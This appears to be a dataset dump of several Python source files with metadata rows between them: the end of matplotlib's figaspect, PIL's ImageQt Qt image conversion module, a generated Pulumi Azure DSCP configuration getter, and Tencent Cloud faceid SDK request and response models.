    that the width is in the range [4., 16.] and the height is in the range
    [2., 16.]. If necessary, the default height is adjusted to ensure this.

    Parameters
    ----------
    arg : scalar or 2d array
        If a scalar, this defines the aspect ratio (i.e. the ratio height /
        width).
        In case of an array the aspect ratio is number of rows / number of
        columns, so that the array could be fitted in the figure undistorted.

    Returns
    -------
    width, height
        The figure size in inches.

    Notes
    -----
    If you want to create an axes within the figure, that still preserves the
    aspect ratio, be sure to create it with equal width and height. See
    examples below.

    Thanks to Fernando Perez for this function.

    Examples
    --------
    Make a figure twice as tall as it is wide::

        w, h = figaspect(2.)
        fig = Figure(figsize=(w, h))
        ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
        ax.imshow(A, **kwargs)

    Make a figure with the proper aspect for an array::

        A = rand(5, 3)
        w, h = figaspect(A)
        fig = Figure(figsize=(w, h))
        ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
        ax.imshow(A, **kwargs)
    """
    # min/max sizes to respect when autoscaling; hardwired for now.
    size_min = np.array((4.0, 2.0))    # min length for width/height
    size_max = np.array((16.0, 16.0))  # max length for width/height

    # Extract the aspect ratio: rows/columns for an array, the value
    # itself for a scalar.
    if hasattr(arg, 'shape') and not np.isscalar(arg):
        nrows, ncols = arg.shape[:2]
        aspect = nrows / ncols
    else:
        aspect = arg

    # Height of user figure defaults
    height = rcParams['figure.figsize'][1]

    # New size for the figure, keeping the aspect ratio of the caller
    size = np.array((height / aspect, height))

    # Sanity checks: scale up if either dimension falls below its
    # minimum ...
    size /= min(1.0, *(size / size_min))
    # ... and scale down to avoid humongous windows.
    size /= max(1.0, *(size / size_max))

    # Finally, if we have a really funky aspect ratio, break it but
    # respect the min/max dimensions (no 10-foot-tall figures!).
    return np.clip(size, size_min, size_max)
docstring.interpd.update(Figure=martist.kwdoc(Figure))
| [
"[email protected]"
] | |
6733aab9ea53e9cbe7a36f8c18521ad328708815 | fbbe424559f64e9a94116a07eaaa555a01b0a7bb | /pytorch/source/PIL/ImageQt.py | b747781c50bd2eede24eb9145a6224a4a90712ff | [
"MIT"
] | permissive | ryfeus/lambda-packs | 6544adb4dec19b8e71d75c24d8ed789b785b0369 | cabf6e4f1970dc14302f87414f170de19944bac2 | refs/heads/master | 2022-12-07T16:18:52.475504 | 2022-11-29T13:35:35 | 2022-11-29T13:35:35 | 71,386,735 | 1,283 | 263 | MIT | 2022-11-26T05:02:14 | 2016-10-19T18:22:39 | Python | UTF-8 | Python | false | false | 6,558 | py | #
# The Python Imaging Library.
# $Id$
#
# a simple Qt image interface.
#
# history:
# 2006-06-03 fl: created
# 2006-06-04 fl: inherit from QImage instead of wrapping it
# 2006-06-05 fl: removed toimage helper; move string support to ImageQt
# 2013-11-13 fl: add support for Qt5 ([email protected])
#
# Copyright (c) 2006 by Secret Labs AB
# Copyright (c) 2006 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isPath, py3
from io import BytesIO
import sys
# Supported Qt bindings in preference order: (version tag, module name).
qt_versions = [
    ['5', 'PyQt5'],
    ['side2', 'PySide2'],
    ['4', 'PyQt4'],
    ['side', 'PySide']
]
# If a version has already been imported, attempt it first
qt_versions.sort(key=lambda qt_version: qt_version[1] in sys.modules,
                 reverse=True)
for qt_version, qt_module in qt_versions:
    try:
        if qt_module == 'PyQt5':
            from PyQt5.QtGui import QImage, qRgba, QPixmap
            from PyQt5.QtCore import QBuffer, QIODevice
        elif qt_module == 'PySide2':
            from PySide2.QtGui import QImage, qRgba, QPixmap
            from PySide2.QtCore import QBuffer, QIODevice
        elif qt_module == 'PyQt4':
            from PyQt4.QtGui import QImage, qRgba, QPixmap
            from PyQt4.QtCore import QBuffer, QIODevice
        elif qt_module == 'PySide':
            from PySide.QtGui import QImage, qRgba, QPixmap
            from PySide.QtCore import QBuffer, QIODevice
    except (ImportError, RuntimeError):
        # This binding is not importable; try the next candidate.
        continue
    qt_is_installed = True
    break
else:
    # for/else: loop completed without a break, i.e. no Qt binding imported.
    qt_is_installed = False
    qt_version = None
def rgb(r, g, b, a=255):
    """(Internal) Turns an RGB color into a Qt compatible color integer."""
    # use qRgba to pack the colors; the & 0xffffffff truncates the result
    # to an unsigned 32-bit value with the same bit pattern.
    return (qRgba(r, g, b, a) & 0xffffffff)
def fromqimage(im):
    """
    Create a PIL Image from a Qt QImage.

    :param im: A QImage object (anything providing ``hasAlphaChannel`` and
        ``save``); the original docstring incorrectly described this as a
        PIL Image / file name.
    """
    buffer = QBuffer()
    buffer.open(QIODevice.ReadWrite)
    # preserve alpha channel with png
    # otherwise ppm is more friendly with Image.open
    if im.hasAlphaChannel():
        im.save(buffer, 'png')
    else:
        im.save(buffer, 'ppm')

    b = BytesIO()
    try:
        b.write(buffer.data())
    except TypeError:
        # workaround for Python 2 (QByteArray is not bytes-like there)
        b.write(str(buffer.data()))
    buffer.close()
    b.seek(0)

    return Image.open(b)
def fromqpixmap(im):
    """Create a PIL Image from a QPixmap (delegates to :func:`fromqimage`)."""
    return fromqimage(im)
def align8to32(bytes, width, mode):
    """
    converts each scanline of data from 8 bit to 32 bit aligned
    """
    bits_per_pixel = {
        '1': 1,
        'L': 8,
        'P': 8,
    }[mode]

    # Bytes needed per scanline, rounded up to whole bytes...
    bytes_per_line = -(-(bits_per_pixel * width) // 8)
    # ...and the zero bytes to append so every line is 4-byte (32-bit) aligned.
    extra_padding = -bytes_per_line % 4

    if not extra_padding:
        # Already 32-bit aligned by luck; return the buffer untouched.
        return bytes

    padding = b'\x00' * extra_padding
    return b''.join(
        bytes[line * bytes_per_line:(line + 1) * bytes_per_line] + padding
        for line in range(len(bytes) // bytes_per_line))
def _toqclass_helper(im):
    """Map a PIL image, file name or PyQt string to QImage constructor args.

    Returns a dict with ``data`` (the raw pixel buffer), ``im`` (the PIL
    image), ``format`` (a QImage format constant) and ``colortable``
    (palette list for indexed modes, otherwise None).
    """
    data = None
    colortable = None

    # handle filename, if given instead of image name
    if hasattr(im, "toUtf8"):
        # FIXME - is this really the best way to do this?
        if py3:
            im = str(im.toUtf8(), "utf-8")
        else:
            im = unicode(im.toUtf8(), "utf-8")  # noqa: F821
    if isPath(im):
        im = Image.open(im)

    if im.mode == "1":
        format = QImage.Format_Mono
    elif im.mode == "L":
        # 8-bit grayscale: indexed format with a linear gray palette.
        format = QImage.Format_Indexed8
        colortable = []
        for i in range(256):
            colortable.append(rgb(i, i, i))
    elif im.mode == "P":
        # Paletted image: convert the flat RGB palette to Qt color ints.
        format = QImage.Format_Indexed8
        colortable = []
        palette = im.getpalette()
        for i in range(0, len(palette), 3):
            colortable.append(rgb(*palette[i:i+3]))
    elif im.mode == "RGB":
        data = im.tobytes("raw", "BGRX")
        format = QImage.Format_RGB32
    elif im.mode == "RGBA":
        try:
            data = im.tobytes("raw", "BGRA")
        except SystemError:
            # workaround for earlier versions: swap channels via split/merge
            r, g, b, a = im.split()
            im = Image.merge("RGBA", (b, g, r, a))
        format = QImage.Format_ARGB32
    else:
        raise ValueError("unsupported image mode %r" % im.mode)

    # QImage scanlines must be 32-bit aligned; pad mono/indexed data.
    __data = data or align8to32(im.tobytes(), im.size[0], im.mode)
    return {
        'data': __data, 'im': im, 'format': format, 'colortable': colortable
    }
if qt_is_installed:
    class ImageQt(QImage):

        def __init__(self, im):
            """
            A PIL image wrapper for Qt.  This is a subclass of PyQt's QImage
            class.

            :param im: A PIL Image object, or a file name (given either as
                Python string or a PyQt string object).
            """
            im_data = _toqclass_helper(im)
            # must keep a reference, or Qt will crash!
            # All QImage constructors that take data operate on an existing
            # buffer, so this buffer has to hang on for the life of the image.
            # Fixes https://github.com/python-pillow/Pillow/issues/1370
            self.__data = im_data['data']
            QImage.__init__(self,
                            self.__data, im_data['im'].size[0],
                            im_data['im'].size[1], im_data['format'])
            if im_data['colortable']:
                # Indexed modes ('1', 'L', 'P') also need their palette set.
                self.setColorTable(im_data['colortable'])
def toqimage(im):
    """Convert a PIL Image (or file name) to an :class:`ImageQt` QImage."""
    return ImageQt(im)
def toqpixmap(im):
    """Convert a PIL Image to a QPixmap (via an intermediate QImage)."""
    # RGB images are promoted to RGBA first to work around a rendering bug
    # observed with plain RGB pixmaps.
    source = im.convert('RGBA') if im.mode == 'RGB' else im
    return QPixmap.fromImage(toqimage(source))
| [
"[email protected]"
] | |
b7174ad5e70aad83997120f3f26a0af8c31902f4 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/network/v20210501/get_dscp_configuration.py | 1dde2dd4b7042811e658cde1bbc7524c32f1811b | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,569 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
# Public names exported by this module.
__all__ = [
    'GetDscpConfigurationResult',
    'AwaitableGetDscpConfigurationResult',
    'get_dscp_configuration',
    'get_dscp_configuration_output',
]
@pulumi.output_type
class GetDscpConfigurationResult:
    """
    Differentiated Services Code Point configuration for any given network interface
    """
    # NOTE: generated code (see the file header) -- each constructor argument
    # is defensively type-checked and stored via pulumi.set; the @property
    # accessors below read the same keys back via pulumi.get.
    def __init__(__self__, associated_network_interfaces=None, destination_ip_ranges=None, destination_port_ranges=None, etag=None, id=None, location=None, markings=None, name=None, protocol=None, provisioning_state=None, qos_collection_id=None, qos_definition_collection=None, resource_guid=None, source_ip_ranges=None, source_port_ranges=None, tags=None, type=None):
        if associated_network_interfaces and not isinstance(associated_network_interfaces, list):
            raise TypeError("Expected argument 'associated_network_interfaces' to be a list")
        pulumi.set(__self__, "associated_network_interfaces", associated_network_interfaces)
        if destination_ip_ranges and not isinstance(destination_ip_ranges, list):
            raise TypeError("Expected argument 'destination_ip_ranges' to be a list")
        pulumi.set(__self__, "destination_ip_ranges", destination_ip_ranges)
        if destination_port_ranges and not isinstance(destination_port_ranges, list):
            raise TypeError("Expected argument 'destination_port_ranges' to be a list")
        pulumi.set(__self__, "destination_port_ranges", destination_port_ranges)
        if etag and not isinstance(etag, str):
            raise TypeError("Expected argument 'etag' to be a str")
        pulumi.set(__self__, "etag", etag)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if location and not isinstance(location, str):
            raise TypeError("Expected argument 'location' to be a str")
        pulumi.set(__self__, "location", location)
        if markings and not isinstance(markings, list):
            raise TypeError("Expected argument 'markings' to be a list")
        pulumi.set(__self__, "markings", markings)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if protocol and not isinstance(protocol, str):
            raise TypeError("Expected argument 'protocol' to be a str")
        pulumi.set(__self__, "protocol", protocol)
        if provisioning_state and not isinstance(provisioning_state, str):
            raise TypeError("Expected argument 'provisioning_state' to be a str")
        pulumi.set(__self__, "provisioning_state", provisioning_state)
        if qos_collection_id and not isinstance(qos_collection_id, str):
            raise TypeError("Expected argument 'qos_collection_id' to be a str")
        pulumi.set(__self__, "qos_collection_id", qos_collection_id)
        if qos_definition_collection and not isinstance(qos_definition_collection, list):
            raise TypeError("Expected argument 'qos_definition_collection' to be a list")
        pulumi.set(__self__, "qos_definition_collection", qos_definition_collection)
        if resource_guid and not isinstance(resource_guid, str):
            raise TypeError("Expected argument 'resource_guid' to be a str")
        pulumi.set(__self__, "resource_guid", resource_guid)
        if source_ip_ranges and not isinstance(source_ip_ranges, list):
            raise TypeError("Expected argument 'source_ip_ranges' to be a list")
        pulumi.set(__self__, "source_ip_ranges", source_ip_ranges)
        if source_port_ranges and not isinstance(source_port_ranges, list):
            raise TypeError("Expected argument 'source_port_ranges' to be a list")
        pulumi.set(__self__, "source_port_ranges", source_port_ranges)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="associatedNetworkInterfaces")
    def associated_network_interfaces(self) -> Sequence['outputs.NetworkInterfaceResponse']:
        """
        Associated Network Interfaces to the DSCP Configuration.
        """
        return pulumi.get(self, "associated_network_interfaces")

    @property
    @pulumi.getter(name="destinationIpRanges")
    def destination_ip_ranges(self) -> Optional[Sequence['outputs.QosIpRangeResponse']]:
        """
        Destination IP ranges.
        """
        return pulumi.get(self, "destination_ip_ranges")

    @property
    @pulumi.getter(name="destinationPortRanges")
    def destination_port_ranges(self) -> Optional[Sequence['outputs.QosPortRangeResponse']]:
        """
        Destination port ranges.
        """
        return pulumi.get(self, "destination_port_ranges")

    @property
    @pulumi.getter
    def etag(self) -> str:
        """
        A unique read-only string that changes whenever the resource is updated.
        """
        return pulumi.get(self, "etag")

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        Resource ID.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def location(self) -> Optional[str]:
        """
        Resource location.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def markings(self) -> Optional[Sequence[int]]:
        """
        List of markings to be used in the configuration.
        """
        return pulumi.get(self, "markings")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Resource name.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def protocol(self) -> Optional[str]:
        """
        RNM supported protocol types.
        """
        return pulumi.get(self, "protocol")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """
        The provisioning state of the DSCP Configuration resource.
        """
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter(name="qosCollectionId")
    def qos_collection_id(self) -> str:
        """
        Qos Collection ID generated by RNM.
        """
        return pulumi.get(self, "qos_collection_id")

    @property
    @pulumi.getter(name="qosDefinitionCollection")
    def qos_definition_collection(self) -> Optional[Sequence['outputs.QosDefinitionResponse']]:
        """
        QoS object definitions
        """
        return pulumi.get(self, "qos_definition_collection")

    @property
    @pulumi.getter(name="resourceGuid")
    def resource_guid(self) -> str:
        """
        The resource GUID property of the DSCP Configuration resource.
        """
        return pulumi.get(self, "resource_guid")

    @property
    @pulumi.getter(name="sourceIpRanges")
    def source_ip_ranges(self) -> Optional[Sequence['outputs.QosIpRangeResponse']]:
        """
        Source IP ranges.
        """
        return pulumi.get(self, "source_ip_ranges")

    @property
    @pulumi.getter(name="sourcePortRanges")
    def source_port_ranges(self) -> Optional[Sequence['outputs.QosPortRangeResponse']]:
        """
        Sources port ranges.
        """
        return pulumi.get(self, "source_port_ranges")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Resource tags.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Resource type.
        """
        return pulumi.get(self, "type")
class AwaitableGetDscpConfigurationResult(GetDscpConfigurationResult):
    # Makes the (already-resolved) result usable with ``await``: the dead
    # ``yield`` turns __await__ into a generator function, as the protocol
    # requires, and the generator immediately returns a plain result copy.
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetDscpConfigurationResult(
            associated_network_interfaces=self.associated_network_interfaces,
            destination_ip_ranges=self.destination_ip_ranges,
            destination_port_ranges=self.destination_port_ranges,
            etag=self.etag,
            id=self.id,
            location=self.location,
            markings=self.markings,
            name=self.name,
            protocol=self.protocol,
            provisioning_state=self.provisioning_state,
            qos_collection_id=self.qos_collection_id,
            qos_definition_collection=self.qos_definition_collection,
            resource_guid=self.resource_guid,
            source_ip_ranges=self.source_ip_ranges,
            source_port_ranges=self.source_port_ranges,
            tags=self.tags,
            type=self.type)
def get_dscp_configuration(dscp_configuration_name: Optional[str] = None,
                           resource_group_name: Optional[str] = None,
                           opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDscpConfigurationResult:
    """
    Differentiated Services Code Point configuration for any given network interface

    Returns an awaitable result wrapping the provider's
    ``getDscpConfiguration`` invoke.

    :param str dscp_configuration_name: The name of the resource.
    :param str resource_group_name: The name of the resource group.
    """
    __args__ = dict()
    __args__['dscpConfigurationName'] = dscp_configuration_name
    __args__['resourceGroupName'] = resource_group_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # Default the provider version to this SDK's own version.
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-native:network/v20210501:getDscpConfiguration', __args__, opts=opts, typ=GetDscpConfigurationResult).value

    return AwaitableGetDscpConfigurationResult(
        associated_network_interfaces=__ret__.associated_network_interfaces,
        destination_ip_ranges=__ret__.destination_ip_ranges,
        destination_port_ranges=__ret__.destination_port_ranges,
        etag=__ret__.etag,
        id=__ret__.id,
        location=__ret__.location,
        markings=__ret__.markings,
        name=__ret__.name,
        protocol=__ret__.protocol,
        provisioning_state=__ret__.provisioning_state,
        qos_collection_id=__ret__.qos_collection_id,
        qos_definition_collection=__ret__.qos_definition_collection,
        resource_guid=__ret__.resource_guid,
        source_ip_ranges=__ret__.source_ip_ranges,
        source_port_ranges=__ret__.source_port_ranges,
        tags=__ret__.tags,
        type=__ret__.type)
@_utilities.lift_output_func(get_dscp_configuration)
def get_dscp_configuration_output(dscp_configuration_name: Optional[pulumi.Input[str]] = None,
                                  resource_group_name: Optional[pulumi.Input[str]] = None,
                                  opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetDscpConfigurationResult]:
    """
    Differentiated Services Code Point configuration for any given network interface

    :param str dscp_configuration_name: The name of the resource.
    :param str resource_group_name: The name of the resource group.
    """
    # Body intentionally empty: lift_output_func wraps get_dscp_configuration
    # to produce this Output-returning variant.
    ...
| [
"[email protected]"
] | |
4de5d342f5f6db3ec70d35c5b46c60132fe5dbc6 | fae0af723a5d2b41fa57e5cc0bec700974440069 | /tencentcloud/faceid/v20180301/models.py | a078bf16f7239b59287d4ff2c20a108960d6620c | [
"Apache-2.0"
] | permissive | simiaoxiaoseng/tencentcloud-sdk-python | dc319b492967044bf08756a7591e06d70f6d1e4b | e93b2291526946fd2381fc9e40f7f4c7f34c7c42 | refs/heads/master | 2020-04-12T19:11:46.876644 | 2018-12-20T13:39:13 | 2018-12-20T13:39:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,143 | py | # -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tencentcloud.common.abstract_model import AbstractModel
class DetectAuthRequest(AbstractModel):
    """DetectAuth request structure.

    """

    def __init__(self):
        """
        :param RuleId: Scenario identifier used to distinguish customer use cases; assigned offline by Tencent.
        :type RuleId: str
        :param TerminalType: This parameter does not need to be passed for this API.
        :type TerminalType: str
        :param IdCard: Identity identifier (must be the national ID number when comparing against the public-security authoritative database).
Allowed characters: a-zA-Z0-9. Maximum length: 32.
        :type IdCard: str
        :param Name: Name. Maximum length: 32.
        :type Name: str
        :param RedirectUrl: Callback URL to redirect to after verification finishes. Maximum length: 1024.
        :type RedirectUrl: str
        :param Extra: Pass-through field, returned when fetching the verification result.
        :type Extra: str
        :param ImageBase64: Base64-encoded photo used for face comparison;
the Base64-encoded image must not exceed 3 MB; only jpg and png are supported.
        :type ImageBase64: str
        """
        self.RuleId = None
        self.TerminalType = None
        self.IdCard = None
        self.Name = None
        self.RedirectUrl = None
        self.Extra = None
        self.ImageBase64 = None

    def _deserialize(self, params):
        self.RuleId = params.get("RuleId")
        self.TerminalType = params.get("TerminalType")
        self.IdCard = params.get("IdCard")
        self.Name = params.get("Name")
        self.RedirectUrl = params.get("RedirectUrl")
        self.Extra = params.get("Extra")
        self.ImageBase64 = params.get("ImageBase64")
class DetectAuthResponse(AbstractModel):
    """DetectAuth response structure.

    """

    def __init__(self):
        """
        :param Url: URL used to start the identity-verification flow; only used in the WeChat H5 scenario.
        :type Url: str
        :param BizToken: Token identifying one verification flow, valid for 7,200 seconds;
after verification completes it can be used to fetch the result information.
        :type BizToken: str
        :param RequestId: Unique request ID, returned with every request; provide it when reporting an issue.
        :type RequestId: str
        """
        self.Url = None
        self.BizToken = None
        self.RequestId = None

    def _deserialize(self, params):
        self.Url = params.get("Url")
        self.BizToken = params.get("BizToken")
        self.RequestId = params.get("RequestId")
class GetActionSequenceRequest(AbstractModel):
    """GetActionSequence request structure (takes no parameters).

    """
class GetActionSequenceResponse(AbstractModel):
    """GetActionSequence response structure.

    """

    def __init__(self):
        """
        :param ActionSequence: Action order ("2,1" or "1,2"); 1 = open mouth, 2 = close eyes (blink).
        :type ActionSequence: str
        :param RequestId: Unique request ID, returned with every request; provide it when reporting an issue.
        :type RequestId: str
        """
        self.ActionSequence = None
        self.RequestId = None

    def _deserialize(self, params):
        self.ActionSequence = params.get("ActionSequence")
        self.RequestId = params.get("RequestId")
class GetDetectInfoRequest(AbstractModel):
    """GetDetectInfo request structure.

    """

    def __init__(self):
        """
        :param BizToken: Identifier of the verification flow, generated when calling the DetectAuth API.
        :type BizToken: str
        :param RuleId: Scenario identifier used to distinguish customer use cases; assigned offline by Tencent.
        :type RuleId: str
        :param InfoType: Which result information to fetch: 0 all; 1 text; 2 ID-card front/back; 3 best video snapshot; 4 video.
E.g. "134" fetches text, best snapshot and video.
        :type InfoType: str
        """
        self.BizToken = None
        self.RuleId = None
        self.InfoType = None

    def _deserialize(self, params):
        self.BizToken = params.get("BizToken")
        self.RuleId = params.get("RuleId")
        self.InfoType = params.get("InfoType")
class GetDetectInfoResponse(AbstractModel):
    """GetDetectInfo response structure.

    """

    def __init__(self):
        """
        :param DetectInfo: JSON string.
        {
          // Text-type information
          "Text": {
            "ErrCode": null,       // final result code of this verification; 0 means success
            "ErrMsg": null,        // error message of this verification
            "IdCard": "",          // ID number finally obtained by this verification
            "Name": "",            // name finally obtained by this verification
            "OcrNation": null,     // ethnicity from the OCR stage
            "OcrAddress": null,    // address from the OCR stage
            "OcrBirth": null,      // birth information from the OCR stage
            "OcrAuthority": null,  // issuing authority from the OCR stage
            "OcrValidDate": null,  // validity period from the OCR stage
            "OcrName": null,       // name from the OCR stage
            "OcrIdCard": null,     // ID number from the OCR stage
            "OcrGender": null,     // gender from the OCR stage
            "LiveStatus": null,    // liveness-detection stage error code; 0 means success
            "LiveMsg": null,       // liveness-detection stage error message
            "Comparestatus": null, // 1:1 comparison stage error code; 0 means success
            "Comparemsg": null,    // 1:1 comparison stage error message
            "Extra": "",           // the Extra value passed in to DetectAuth
            "Detail": {            // liveness / 1:1 comparison details
              "LivenessData": []
            }
          },
          // Base64 of the ID card front/back photos
          "IdCardData": {
            "OcrFront": null,
            "OcrBack": null
          },
          // Base64 of the best video frame snapshot
          "BestFrame": {
            "BestFrame": null
          },
          // Base64 of the liveness video
          "VideoData": {
            "LivenessVideo": null
          }
        }
        :type DetectInfo: str
        :param RequestId: Unique request ID, returned with every request; provide it when reporting an issue.
        :type RequestId: str
        """
        self.DetectInfo = None
        self.RequestId = None

    def _deserialize(self, params):
        self.DetectInfo = params.get("DetectInfo")
        self.RequestId = params.get("RequestId")
class GetLiveCodeRequest(AbstractModel):
    """GetLiveCode request structure (takes no parameters).

    """
class GetLiveCodeResponse(AbstractModel):
    """GetLiveCode response structure.

    """

    def __init__(self):
        """
        :param LiveCode: Digit verification code, e.g. 1234.
        :type LiveCode: str
        :param RequestId: Unique request ID, returned with every request; provide it when reporting an issue.
        :type RequestId: str
        """
        self.LiveCode = None
        self.RequestId = None

    def _deserialize(self, params):
        self.LiveCode = params.get("LiveCode")
        self.RequestId = params.get("RequestId")
class ImageRecognitionRequest(AbstractModel):
    """ImageRecognition request structure.

    """

    def __init__(self):
        """
        :param IdCard: National ID number.
        :type IdCard: str
        :param Name: Name.
        :type Name: str
        :param ImageBase64: Base64-encoded photo used for face comparison;
the Base64-encoded image must not exceed 3 MB; only jpg and png are supported.
        :type ImageBase64: str
        :param Optional: This parameter does not need to be passed for this API.
        :type Optional: str
        """
        self.IdCard = None
        self.Name = None
        self.ImageBase64 = None
        self.Optional = None

    def _deserialize(self, params):
        self.IdCard = params.get("IdCard")
        self.Name = params.get("Name")
        self.ImageBase64 = params.get("ImageBase64")
        self.Optional = params.get("Optional")
class ImageRecognitionResponse(AbstractModel):
    """ImageRecognition response structure.

    """

    def __init__(self):
        """
        :param Sim: Similarity score in [0.00, 100.00]. A score >= 70 is recommended to judge two faces as the same person; adjust the threshold per scenario (false-accept rate is about 1/1,000 at threshold 70 and 1/10,000 at threshold 80).
        :type Sim: float
        :param RequestId: Unique request ID, returned with every request; provide it when reporting an issue.
        :type RequestId: str
        """
        self.Sim = None
        self.RequestId = None

    def _deserialize(self, params):
        self.Sim = params.get("Sim")
        self.RequestId = params.get("RequestId")
class LivenessCompareRequest(AbstractModel):
    """LivenessCompare request structure.

    """

    def __init__(self):
        """
        :param ImageBase64: Base64-encoded photo used for face comparison;
the Base64-encoded image must not exceed 3 MB; only jpg and png are supported.
        :type ImageBase64: str
        :param VideoBase64: Base64-encoded video used for liveness detection;
the Base64-encoded data must not exceed 5 MB; mp4, avi and flv are supported.
        :type VideoBase64: str
        :param LivenessType: Liveness detection type: LIP / ACTION / SILENT.
LIP is digit mode, ACTION is action mode, SILENT is silent mode; pass exactly one of the three.
        :type LivenessType: str
        :param ValidateData: Digit mode: the lip-language verification code (e.g. 1234), fetched beforehand;
action mode: the action sequence (e.g. 12 or 21), fetched beforehand;
silent mode: empty.
        :type ValidateData: str
        :param Optional: This parameter does not need to be passed for this API.
        :type Optional: str
        """
        self.ImageBase64 = None
        self.VideoBase64 = None
        self.LivenessType = None
        self.ValidateData = None
        self.Optional = None

    def _deserialize(self, params):
        self.ImageBase64 = params.get("ImageBase64")
        self.VideoBase64 = params.get("VideoBase64")
        self.LivenessType = params.get("LivenessType")
        self.ValidateData = params.get("ValidateData")
        self.Optional = params.get("Optional")
class LivenessCompareResponse(AbstractModel):
    """LivenessCompare response structure.

    """

    def __init__(self):
        """
        :param BestFrameBase64: Best snapshot from the video after verification passes, Base64-encoded, jpg format.
        :type BestFrameBase64: str
        :param Sim: Similarity score in [0.00, 100.00]. A score >= 70 is recommended to judge two faces as the same person; adjust the threshold per scenario (false-accept rate is about 1/1,000 at threshold 70 and 1/10,000 at threshold 80).
        :type Sim: float
        :param RequestId: Unique request ID, returned with every request; provide it when reporting an issue.
        :type RequestId: str
        """
        self.BestFrameBase64 = None
        self.Sim = None
        self.RequestId = None

    def _deserialize(self, params):
        self.BestFrameBase64 = params.get("BestFrameBase64")
        self.Sim = params.get("Sim")
        self.RequestId = params.get("RequestId")
class LivenessRecognitionRequest(AbstractModel):
    """LivenessRecognition request structure.

    """

    def __init__(self):
        """
        :param IdCard: National ID number.
        :type IdCard: str
        :param Name: Name.
        :type Name: str
        :param VideoBase64: Base64-encoded video used for liveness detection;
the Base64-encoded data must not exceed 5 MB; mp4, avi and flv are supported.
        :type VideoBase64: str
        :param LivenessType: Liveness detection type: LIP / ACTION / SILENT.
LIP is digit mode, ACTION is action mode, SILENT is silent mode; pass exactly one of the three.
        :type LivenessType: str
        :param ValidateData: Digit mode: the lip-language verification code (e.g. 1234), fetched beforehand;
action mode: the action sequence (e.g. 12 or 21), fetched beforehand;
silent mode: empty.
        :type ValidateData: str
        :param Optional: This parameter does not need to be passed for this API.
        :type Optional: str
        """
        self.IdCard = None
        self.Name = None
        self.VideoBase64 = None
        self.LivenessType = None
        self.ValidateData = None
        self.Optional = None

    def _deserialize(self, params):
        self.IdCard = params.get("IdCard")
        self.Name = params.get("Name")
        self.VideoBase64 = params.get("VideoBase64")
        self.LivenessType = params.get("LivenessType")
        self.ValidateData = params.get("ValidateData")
        self.Optional = params.get("Optional")
class LivenessRecognitionResponse(AbstractModel):
    """LivenessRecognition response structure.

    """

    def __init__(self):
        """
        :param BestFrameBase64: Best snapshot from the video after verification passes, Base64-encoded, jpg format.
        :type BestFrameBase64: str
        :param Sim: Similarity score in [0.00, 100.00]. A score >= 70 is recommended to judge two faces as the same person; adjust the threshold per scenario (false-accept rate is about 1/1,000 at threshold 70 and 1/10,000 at threshold 80).
        :type Sim: float
        :param RequestId: Unique request ID, returned with every request; provide it when reporting an issue.
        :type RequestId: str
        """
        self.BestFrameBase64 = None
        self.Sim = None
        self.RequestId = None

    def _deserialize(self, params):
        self.BestFrameBase64 = params.get("BestFrameBase64")
        self.Sim = params.get("Sim")
        self.RequestId = params.get("RequestId") | [
"[email protected]"
] | |
d41da186fe71beeba5d6a5db47eb2df882f9a820 | 44221bc0507955c1e62d256182291ac95514c4f6 | /automatron_notify/__init__.py | e4ef215bc2aaa375436f09977691bf480f1315f1 | [
"MIT"
